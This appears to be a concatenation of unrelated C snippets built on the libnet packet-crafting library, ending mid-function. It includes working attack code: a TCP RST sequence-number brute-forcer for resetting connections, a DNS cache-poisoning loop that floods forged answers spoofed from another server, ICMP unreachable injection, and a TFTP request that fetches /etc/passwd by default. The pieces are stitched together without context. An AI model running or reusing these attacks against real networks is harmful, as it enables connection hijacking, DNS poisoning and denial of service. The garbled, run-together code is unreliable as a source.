int main(int argc, char **argv) { int c, build_ip, opt, win = 1000, timeout = 10000; unsigned short src_port = 0, dst_port = 0; unsigned long src_ip = 0, dst_ip = 0, seq = 0; libnet_t *l; libnet_ptag_t tcp, ip; struct libnet_stats stat; char errbuf[LIBNET_ERRBUF_SIZE]; memset(&stat, 0, sizeof(stat)); if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) { fprintf(stderr, "Libnet_init error: %s\n", errbuf); exit(-1); } while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1) switch (opt) { case 's': src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE); break; case 'd': dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE); break; case 'p': src_port = atoi(optarg); break; case 'q': dst_port = atoi(optarg); break; case 'n': seq = strtoul(optarg, NULL, 0); break; case 'w': win = atoi(optarg); break; case 't': timeout = atoi(optarg); break; case 'h': case '?': usage(argv[0]); } if (optind < argc) usage(argv[0]); if (!src_ip || !dst_ip || !src_port || !dst_port) usage(argv[0]); if (!seq) { libnet_seed_prand(l); seq = libnet_get_prand(LIBNET_PRu32); } for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) { tcp = libnet_build_tcp( src_port, /* source port */ dst_port, /* destination port */ seq, /* sequence number */ 0, /* acknowledgement num */ TH_RST, /* control flags */ 31337, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ tcp); /* libnet id */ if (tcp == -1) { fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l)); goto bad; } if (build_ip) { build_ip = 0; ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H, /* length */ 0, /* TOS */ 666, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (ip == -1) { fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l)); goto bad; } } if ((c = libnet_write(l)) == -1) { fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l)); goto bad; } usleep(timeout); } libnet_stats(l, &stat); fprintf(stderr, "Packets sent: %d (%d bytes)\n" "Packet errors: %d\n", stat.packets_sent, stat.bytes_written, stat.packet_errors); libnet_destroy(l); exit(0); bad: libnet_destroy(l); exit(-1); }
/* -- FUNCTION: forward -- -- DATE: March 13, 2012 -- -- REVISIONS: (Date and Description) -- -- DESIGNER: Luke Queenan -- -- PROGRAMMER: Luke Queenan -- -- INTERFACE: void forward(u_char *args, const struct pcap_pkthdr *header, const u_char *packet); -- -- RETURNS: void -- -- NOTES: -- This is the function that deals with the actual forwarding of packets. It -- is called by the libpcap loop when a packet matching the filter is detected. -- This function breaks the packet down and creates it using the libnet library -- calls. The packet is then forwarded to the relevent machine. */ void forward(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) { const struct sniff_ip *ip = NULL; const struct sniff_tcp *tcp = NULL; const struct sniff_udp *udp = NULL; info *myInfo = (info*)args; int ipHeaderSize = 0; int tcpHeaderSize = 0; int payloadSize = 0; libnet_ptag_t ptag; u_short sport = 0; u_short dport = 0; struct in_addr src_ip; struct in_addr dst_ip; /* Get the IP header and offset value */ ip = (struct sniff_ip*)(packet + SIZE_ETHERNET); ipHeaderSize = IP_HL(ip) * 4; if (ipHeaderSize < 20) { return; } /* Determine the protocol and handle it */ if (ip->ip_p == IPPROTO_TCP) { /* Get tcp header along with its size */ tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + ipHeaderSize); tcpHeaderSize = TH_OFF(tcp) * 4; if (tcpHeaderSize < 20) { return; } /* If we are the external filter, check to see if the SYN bit is set */ if ((myInfo->externFilter == '1') && ((tcp->th_flags & TH_SYN) == TH_SYN)) { /* Add the data to the map */ addRuleToMaps(ip->ip_src.s_addr, tcp->th_sport, tcp->th_dport); } /* Get the size of the payload */ payloadSize = ntohs(ip->ip_len) - (ipHeaderSize + tcpHeaderSize); /* Get the source and destination information from the map */ if (myInfo->externFilter == '1') { /* We are sending packets to the internal machine */ /* Get the forwarding machine's return port */ if (cliFind(ip->ip_src.s_addr, tcp->th_sport, &sport) == 0) { return; } /* Get the internal machine's listening port and IP for this port */ rlFind(tcp->th_dport, &dport, &dst_ip.s_addr); src_ip.s_addr = ip->ip_dst.s_addr; } else { /* We are sending packets out to the world */ /* Find the client to forward the packet to */ if (srvFind(tcp->th_dport, &dst_ip.s_addr, &dport, &sport) == 0) { return; } /* Set the IP address */ src_ip.s_addr = ip->ip_dst.s_addr; } /* Make the new TCP header */ ptag = libnet_build_tcp( htons(sport), /* source port */ htons(dport), /* destination port */ ntohl(tcp->th_seq), /* sequence number */ ntohl(tcp->th_ack), /* acknowledgement num */ tcp->th_flags, /* control flags */ tcp->th_win, /* window size */ 0, /* checksum */ tcp->th_urp, /* urgent pointer */ tcpHeaderSize + payloadSize, /* TCP packet size */ (u_char *)tcp + tcpHeaderSize, /* payload */ payloadSize, /* payload size */ myInfo->myPacket, /* libnet handle */ 0); /* libnet id */ /* Error check */ if (ptag == -1) { libnet_clear_packet(myInfo->myPacket); return; } } else if (ip->ip_p == IPPROTO_UDP) { /* Grab the UDP packet */ udp = (struct sniff_udp*)(packet + SIZE_ETHERNET + ipHeaderSize); /* If we are the external filter, make sure that we have a rule added */ if (myInfo->externFilter == '1') { addRuleToMaps(ip->ip_src.s_addr, udp->uh_sport, udp->uh_dport); } /* Get the payload size */ payloadSize = ntohs(udp->uh_len) - SIZE_UDP_HEADER; /* Get the source and destination information from the map */ if (myInfo->externFilter == '1') { /* We are sending packets to the internal machine */ /* Get the forwarding machine's return port */ if (cliFind(ip->ip_src.s_addr, udp->uh_sport, &sport) == 0) { return; } /* Get the internal machine's listening port and IP for this port */ rlFind(udp->uh_dport, &dport, &dst_ip.s_addr); src_ip.s_addr = ip->ip_dst.s_addr; } else { /* We are sending packets out to the world */ /* Find the client to forward the packet to */ if (srvFind(udp->uh_dport, &dst_ip.s_addr, &dport, &sport) == 0) { return; } /* Set the IP address */ src_ip.s_addr = ip->ip_dst.s_addr; } /* Make the new UDP header */ ptag = libnet_build_udp( htons(sport), /* source port */ htons(dport), /* destination port */ ntohl(udp->uh_len), /* packet size */ 0, /* checksum */ (u_char *)udp + SIZE_UDP_HEADER, /* payload */ payloadSize, /* payload size */ myInfo->myPacket, /* libnet handle */ 0); /* libnet id */ /* Error check */ if (ptag == -1) { libnet_clear_packet(myInfo->myPacket); return; } } else { /* Protocol that we do not handle, exit */ return; } /* Make the IP header */ ptag = libnet_build_ipv4( ipHeaderSize + tcpHeaderSize + payloadSize, /* length */ ip->ip_tos, /* TOS */ ip->ip_id, /* IP ID */ 0, /* IP Frag */ ip->ip_ttl, /* TTL */ ip->ip_p, /* protocol */ 0, /* checksum */ src_ip.s_addr, /* source IP */ dst_ip.s_addr, /* destination IP */ NULL, /* payload */ 0, /* payload size */ myInfo->myPacket, /* libnet handle */ 0); /* libnet id */ /* Error check */ if (ptag == -1) { libnet_clear_packet(myInfo->myPacket); return; } /* Send the packet out */ libnet_write(myInfo->myPacket); /* Clear the libnet system */ libnet_clear_packet(myInfo->myPacket); return; }
int main(int argc, char *argv[]) { /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_LINK, /* injection type */ // NULL, /* network interface eth0, eth1, etc. NULL is default.*/ "eth11", /* network interface eth0, eth1, etc. NULL is default.*/ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } /* src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; payload = NULL; payload_s = 0; */ while ((c = getopt (argc, argv, "p:t:i:e:")) != EOF) { switch (c) { case 'p': strcpy(payload_file, optarg); break; case 't': strcpy(tcp_file, optarg); break; case 'i': strcpy(ip_file, optarg); break; case 'e': strcpy(eth_file, optarg); break; default: break; } } if (optind != 9) { usage(); exit(0); } i_dns_bind2_addr = libnet_name2addr4(l, dns_bind2_addr, LIBNET_RESOLVE); sscanf("08, 00, 27, 90, 31, 81", "%x, %x, %x, %x, %x, %x", &res_eth_saddr[0], &res_eth_saddr[1], &res_eth_saddr[2], &res_eth_saddr[3], &res_eth_saddr[4], &res_eth_saddr[5]); srand((int)time(0)); int loop_counter = 0; while (1==1) { int randomNumber = (rand()%10000000); while (randomNumber<1000000) randomNumber*=10; sprintf(random_host, ".x-%d.%s", randomNumber,attack_domain); printf("\nNow attacking with domain %s \n",random_host); convertDomain(); // load_payload(); load_payload_query(); // get the new payload with random subdomain load_ethernet(); load_tcp_udp(); load_ip(); convert_proto(); if(ip_proto_val==IPPROTO_TCP){ t = libnet_build_tcp( t_src_port, /* source port */ t_des_port, /* destination port */ t_seq, /* sequence number */ t_ack, /* acknowledgement num */ t_control_val, /* control flags */ t_win, /* window size */ 0, /* checksum */ t_urgent, /* urgent pointer */ LIBNET_TCP_H + payload_filesize, /* TCP packet size */ payload_location, /* payload */ payload_filesize, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ head_type = LIBNET_TCP_H; if (t == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } } if(ip_proto_val==IPPROTO_UDP){ t = libnet_build_udp( t_src_port, /* source port */ t_des_port, /* destination port */ LIBNET_UDP_H + payload_filesize, /* packet length */ 0, /* checksum */ payload_location, /* payload */ payload_filesize, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ head_type = LIBNET_UDP_H; if (t == -1) { fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l)); goto bad; } } t = libnet_build_ipv4( /* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */ LIBNET_IPV4_H + head_type + payload_filesize, /* length */ i_ttos_val, /* TOS */ i_id, /* IP ID */ i_frag, /* IP Frag */ i_ttl, /* TTL */ ip_proto_val, /* protocol */ 0, /* checksum */ i_src_addr, /* source IP */ i_des_addr, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_ethernet( eth_daddr, /* ethernet destination */ eth_saddr, /* ethernet source */ e_proto_val, /* protocol type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); // sending the request to the DNS server free(payload_location); libnet_destroy(l); // reinit the handle so that we can set new parameters to the handle. for (i=0;i<10000;i++) { // loop to send 10000 responses for each request. l = libnet_init( LIBNET_LINK, /* injection type */ // NULL, /* network interface eth0, eth1, etc. NULL is default.*/ "eth11", /* network interface eth0, eth1, etc. NULL is default.*/ errbuf); /* error buffer */ // reinit the handle for sending responses if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } load_payload_answer(); // generate the response and send it // change the ports of source port and destination port to match the second DNS query if(ip_proto_val==IPPROTO_UDP){ t = libnet_build_udp( t_des_port, /* source port */ t_src_port, /* destination port */ LIBNET_UDP_H + payload_filesize, /* packet length */ 0, /* checksum */ payload_location, /* payload */ payload_filesize, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ head_type = LIBNET_UDP_H; if (t == -1) { fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l)); goto bad; } } // change the ethernet headers to match the response from the second DNS server t = libnet_build_ipv4( /* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */ LIBNET_IPV4_H + head_type + payload_filesize, /* length */ i_ttos_val, /* TOS */ i_id, /* IP ID */ i_frag, /* IP Frag */ i_ttl, /* TTL */ ip_proto_val, /* protocol */ 0, /* checksum */ i_dns_bind2_addr, /* source IP */ i_des_addr, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_ethernet( eth_daddr, /* ethernet destination */ res_eth_saddr, /* ethernet source */ e_proto_val, /* protocol type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); printf("**** %d packets sent **** (packetsize: %d bytes each)\n",eth_pktcount,c); /* tell them what we just did */ free(payload_location); libnet_destroy(l); } l = libnet_init( LIBNET_LINK, /* injection type */ // NULL, /* network interface eth0, eth1, etc. NULL is default.*/ "eth11", /* network interface eth0, eth1, etc. NULL is default.*/ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } loop_counter++; printf("%d\n", loop_counter); if(loop_counter == 2){ break; } // loop to do for multiple unique requests } /* give the buf memory back */ // clear memory libnet_destroy(l); return 0; bad: libnet_destroy(l); return (EXIT_FAILURE); // clear memory on failure }
void frag_and_send(u_int8_t *payload, u_int32_t total_pload_size) { /* Builds and sends the first packet, calling get_sum() to * * get the correct checksum for the ICMP packet (with the * * whole payload). Then builds and sends IP fragments * * until all the payload is sent. */ char ip_addr_str[16]; u_int32_t ip_addr, src_addr; u_int16_t id, seq, ip_id; /* hdr_offset = fragmentation flags + offset (in bytes) * * divided by 8 */ int pload_offset, hdr_offset; int bytes_written, max_pload_size, packet_pload_size; libnet_ptag_t ip_tag; /* Generating random IDs */ id = (u_int16_t)libnet_get_prand(LIBNET_PR16); /* We need a non-zero id number for the IP headers, * * otherwise libnet will increase it after each * * build_ipv4, breaking the fragments */ ip_id = (u_int16_t)libnet_get_prand(LIBNET_PR16); seq = 1; /* Getting IP addresses */ src_addr = libnet_get_ipaddr4(l); if (src_addr == -1) { fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } printf("Destination IP address: "); scanf("%15s", ip_addr_str); ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE); if (ip_addr == -1) { fprintf(stderr, "Error converting IP address.\n"); libnet_destroy(l); exit(EXIT_FAILURE); } /* Getting max payload size */ max_pload_size = (MTU - LIBNET_IPV4_H); /* making it a multiple of 8 */ max_pload_size -= (max_pload_size % 8); pload_offset = 0; /* Building the first packet, which carries the ICMP * * header */ /* We're doing (payload size - icmp header size) and not * * checking if it's a multiple of 8 because we know the * * header is 8 bytes long */ if (total_pload_size > (max_pload_size - LIBNET_ICMPV4_ECHO_H)) { hdr_offset = IP_MF; packet_pload_size = max_pload_size - LIBNET_ICMPV4_ECHO_H; } else { hdr_offset = 0; packet_pload_size = total_pload_size; } /* ICMP header */ if (libnet_build_icmpv4_echo(ICMP_ECHO, 0, get_sum(payload, total_pload_size, id, seq), id, seq, payload, packet_pload_size, l, 0) == -1) { fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } /* First IP header (no payload, offset == 0) */ if (libnet_build_ipv4( (LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + packet_pload_size), 0, ip_id, hdr_offset, 255, IPPROTO_ICMP, 0, src_addr, ip_addr, NULL, 0, l, 0) == -1) { fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } /* Writing packet */ bytes_written = libnet_write(l); if (bytes_written != -1) printf("%d bytes written.\n", bytes_written); else fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l)); /* Updating the offset */ pload_offset += packet_pload_size; /* Clearing */ /* We need to get rid of the ICMP header to build the * * other fragments */ libnet_clear_packet(l); ip_tag = LIBNET_PTAG_INITIALIZER; /* Looping until all the payload is sent */ while (total_pload_size > pload_offset) { /* Building IP header */ /* checking if there will be more fragments */ if ((total_pload_size - pload_offset) > max_pload_size) { /* In IP's eyes, the ICMP header in the first packet * needs to be in the offset, so we add its size to * the payload offset here */ hdr_offset = IP_MF + (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8; packet_pload_size = max_pload_size; } else { /* See above */ hdr_offset = (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8; packet_pload_size = total_pload_size - pload_offset; } ip_tag = libnet_build_ipv4((LIBNET_IPV4_H + max_pload_size), 0, ip_id, hdr_offset, 255, IPPROTO_ICMP, 0, src_addr, ip_addr, (payload + pload_offset), packet_pload_size, l, ip_tag); if (ip_tag == -1) { fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } /* Writing packet */ bytes_written = libnet_write(l); if (bytes_written != -1) printf("%d bytes written.\n", bytes_written); else fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l)); /* Updating the offset */ pload_offset += packet_pload_size; } }
int main(int argc, char *argv[]) { int c; libnet_t *l; char *device = "eth0"; char *dst = NULL; char src[HOST_NAME_MAX+1]; u_long src_ip, dst_ip; char errbuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t ip_ptag = 0; char *cur_host; int valid; u_char payload[255] = {0x11, 0x11, 0x22, 0x22, 0x00, 0x08, 0xc6, 0xa5}; u_long payload_s = 8; int i; while ((c = getopt(argc, argv, "d:i:h")) != EOF) { switch (c) { case 'd': dst = optarg; break; case 'i': device = optarg; break; case 'h': usage(argv[0]); exit(EXIT_SUCCESS); default: exit(EXIT_FAILURE); } } if (!dst) { usage(argv[0]); exit(EXIT_FAILURE); } gethostname(src, HOST_NAME_MAX); cur_host = valid_hosts[0]; for (i=0, valid=0; cur_host; i++) { if (strstr(cur_host, src)) { valid = 1; break; } cur_host = valid_hosts[i]; } if (!valid) { fprintf(stderr, "Uh uh. I don't think so.\n"); exit(EXIT_FAILURE); } l = libnet_init( LIBNET_RAW4, /* injection type */ device, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } if ((dst_ip = libnet_name2addr4(l, dst, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", dst); exit(EXIT_FAILURE); } if ((src_ip = libnet_name2addr4(l, src, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", src); exit(EXIT_FAILURE); } ip_ptag = libnet_build_ipv4( LIBNET_IPV4_H + payload_s, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_RESTART, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ ip_ptag); /* libnet id */ if (ip_ptag == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Sent restart packet to %s.\n", dst); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char *argv[]) { int c; libnet_t *l; u_long src_ip, dst_ip; char errbuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t udp = 0, ip = 0; char *filename = "/etc/passwd"; char mode[] = "netascii"; u_char *payload = NULL; uint32_t payload_s = 0; printf("libnet 1.1 packet shaping: UDP + payload[raw] == TFTP\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; while ((c = getopt(argc, argv, "d:s:p:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); goto bad; } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); goto bad; } break; case 'p': filename = optarg; break; default: fprintf(stderr, "unkown option [%s]: bye bye\n", optarg); goto bad; } } if (!src_ip || !dst_ip) { usage(argv[0]); exit(EXIT_FAILURE); } /* * build payload * * 2 bytes string 1 byte string 1 byte * ------------------------------------------------ * | Opcode | Filename | 0 | Mode | 0 | * ------------------------------------------------ * */ payload_s = 2 + strlen(filename) + 1 + strlen(mode) + 1; payload = malloc(sizeof(char)*payload_s); if (!payload) { fprintf(stderr, "malloc error for payload\n"); goto bad; } memset(payload, 0, payload_s); payload[1] = 1; /* opcode - GET */ memcpy(payload + 2, filename, strlen(filename)); memcpy(payload + 2 + strlen(filename) + 1 , mode, strlen(mode)); /* * Build pblocks */ udp = libnet_build_udp( 0x1234, /* source port */ 69, /* destination port */ LIBNET_UDP_H + payload_s, /* packet length */ 0, /* checksum */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (udp == -1) { fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l)); goto bad; } ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length - dont forget the UDP's payload */ 0, /* TOS */ 0x4242, /* IP ID */ 0, /* IP Frag */ 0x42, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload (already in UDP) */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte TFTP packet; check the wire.\n", c); } libnet_destroy(l); free(payload); return (EXIT_SUCCESS); bad: libnet_destroy(l); free(payload); return (EXIT_FAILURE); }
/* Send an ICMP packet, such as host unreachable, to the source and destination addresses */ void rst_icmp_send(pkt_t *rst) { struct ip *ih = NULL; struct tcphdr *th = NULL; int pair = 0; char *state = NULL; size_t icmp_len = 0; ih = (struct ip *)(rst->pkt + sizeof(struct ether_header)); th = (struct tcphdr *)(rst->pkt + sizeof(struct ether_header) + sizeof(struct ip)); /* The interface described in "Building Open Source Network Security Tools" * appears to be deprecated. The new interface tunnels an IPv4 packet * within the ICMP unreachable using the libnet context. */ switch (rst->icmp.type) { /* RFC 792 * * Type 3 * * Codes 0, 1, 4, and 5 may be received from a gateway. Codes 2 and * 3 may be received from a host. * * 0 = net unreachable; * 1 = host unreachable; * 2 = protocol unreachable; * 3 = port unreachable; * 4 = fragmentation needed and DF set; * 5 = source route failed. * */ case ICMP_UNREACH: icmp_len = LIBNET_ICMPV4_UNREACH_H + LIBNET_IPV4_H + ICMP_PKTLEN; LIBNET_ERR(libnet_build_icmpv4_unreach( rst->icmp.type, /* ICMP type, e.g. 3 (Unreachable) */ rst->icmp.code, /* ICMP code, e.g., 1 (Bad Host) */ 0, /* auto checksum */ (u_char *)ih, /* payload */ LIBNET_IPV4_H + ICMP_PKTLEN, /* payload size */ rst->l, /* libnet context */ 0 /* ptag */ )); break; /* * Type 5 * * Codes 0, 1, 2, and 3 may be received from a gateway. * * 0 = Redirect datagrams for the Network. * 1 = Redirect datagrams for the Host. * 2 = Redirect datagrams for the Type of Service and Network. * 3 = Redirect datagrams for the Type of Service and Host. * */ case ICMP_REDIRECT: icmp_len = LIBNET_ICMPV4_REDIRECT_H; LIBNET_ERR(libnet_build_icmpv4_unreach( rst->icmp.type, rst->icmp.code, 0, (u_char *)ih, LIBNET_IPV4_H + ICMP_PKTLEN, rst->l, 0)); break; /* * Type 11 * * Code 0 may be received from a gateway. Code 1 may be received * from a host. * * 0 = time to live exceeded in transit * 1 = fragment reassembly time exceeded * */ case ICMP_TIMXCEED: icmp_len = LIBNET_ICMPV4_TIMXCEED_H + LIBNET_IPV4_H + ICMP_PKTLEN; LIBNET_ERR(libnet_build_icmpv4_timeexceed( rst->icmp.type, rst->icmp.code, 0, (u_char *)ih, LIBNET_IPV4_H + ICMP_PKTLEN, rst->l, 0)); break; case ICMP_PARAMPROB: case ICMP_SOURCEQUENCH: errx(EXIT_FAILURE, "Not supported by libnet."); break; default: errx(EXIT_FAILURE, "ICMP type %d is not supported yet\n", rst->icmp.type); } LIBNET_ERR(libnet_build_ipv4( LIBNET_IPV4_H + icmp_len, /* payload size */ IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* TOS */ ntohs(ih->ip_id)+1, /* IP ID */ 0, /* Frag */ 64, /* TTL */ IPPROTO_ICMP, /* Protocol */ 0, /* auto checksum */ ih->ip_dst.s_addr, /* source */ ih->ip_src.s_addr, /* destination */ NULL, /* payload */ 0, /* payload size */ rst->l, /* libnet context */ 0 /* libnet ptag */ )); state = ((libnet_write(rst->l) == -1) ? "x" : "I"); (void)fprintf(stdout, "[%s] SRC = %15s:%-6u DST = %15s:%-6u len = %d/%d\n", state, libnet_addr2name4(PAIR(pair, ih->ip_src.s_addr, ih->ip_dst.s_addr), LIBNET_DONT_RESOLVE), PAIR(pair, ntohs(th->th_sport), ntohs(th->th_dport)), libnet_addr2name4(PAIR(pair, ih->ip_dst.s_addr, ih->ip_src.s_addr), LIBNET_DONT_RESOLVE), PAIR(pair, ntohs(th->th_dport), ntohs(th->th_sport)), LIBNET_IPV4_H + (u_int32_t)icmp_len, ntohs(ih->ip_len)); (void)fflush(stdout); usleep(rst->sleep_for); }
int main() { libnet_t *handle; /* Libnet handler */ int packet_size; char *device = "10.1.2.3"; /* device name */ char *src_ip_str = "10.1.2.3"; /* Source IP String*/ char *dst_ip_str = "10.1.2.2"; /* Destination IP String*/ u_char src_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; /* Source MAC */ u_char dst_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x01}; /* Destination MAC */ u_long dst_ip, src_ip; char error[LIBNET_ERRBUF_SIZE]; libnet_ptag_t eth_tag, ip_tag, tcp_tag, tcp_op_tag; u_short proto = IPPROTO_TCP; /* Transport layer protocol*/ u_char payload[1400] = {0}; u_long payload_s = 0; /* length of payload */ /* Turn IP string to IP(little endian)*/ dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE); src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE); /* init Libnet */ if ( (handle = libnet_init(LIBNET_LINK, device, error)) == NULL ) { printf("libnet_init failure\n"); return (-1); }; strncpy(payload, "123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678123456781234567812345678", sizeof(payload)-1); /* load construct */ payload_s = strlen(payload); printf("%lu\n",payload_s); #if 0 /* produce TCP */ tcp_op_tag = libnet_build_tcp_options( payload, payload_s, handle, 0 ); if (tcp_op_tag == -1) { printf("build_tcp_options failure\n"); return (-2); }; #endif tcp_tag = libnet_build_tcp( 30330, /* Source port */ 30331, /* Destination port */ 8888, /* sequence number */ 8889, /* acknowledgement number */ TH_PUSH | TH_ACK, /* Control flags */ 14600, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + payload_s, /* length */ payload, /* payload */ payload_s, /* length of payload */ handle, /* libnet handler */ 0 /* protocol tag to modify an existing header, 0 to build a new one */ ); if (tcp_tag == -1) { printf("libnet_build_tcp failure\n"); return (-3); }; /* IP */ ip_tag = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* total length of the IP packet,*/ 0, /* tos */ (u_short) libnet_get_prand(LIBNET_PRu16), /* IP identification number */ 0, /* fragmentation bits and offset */ (u_int8_t)libnet_get_prand(LIBNET_PR8), /* time to live in the network */ proto, /* upper layer protocol */ 0, /* checksum (0 for libnet to autofill) */ src_ip, /* source IPv4 address (little endian) */ dst_ip, /* destination IPv4 address (little endian) */ NULL, /* payload */ 0, /* payload length*/ handle, /* Libnet handler */ 0 /* protocol tag to modify an existing header, 0 to build a new one */ ); if (ip_tag == -1) { printf("libnet_build_ipv4 failure\n"); return (-4); }; /* MAC */ eth_tag = libnet_build_ethernet( dst_mac, /* destination ethernet address */ src_mac, /* source ethernet address */ ETHERTYPE_IP, /* upper layer protocol type */ NULL, /* payload */ 0, /* payload length */ handle, /* Libnet handler*/ 0 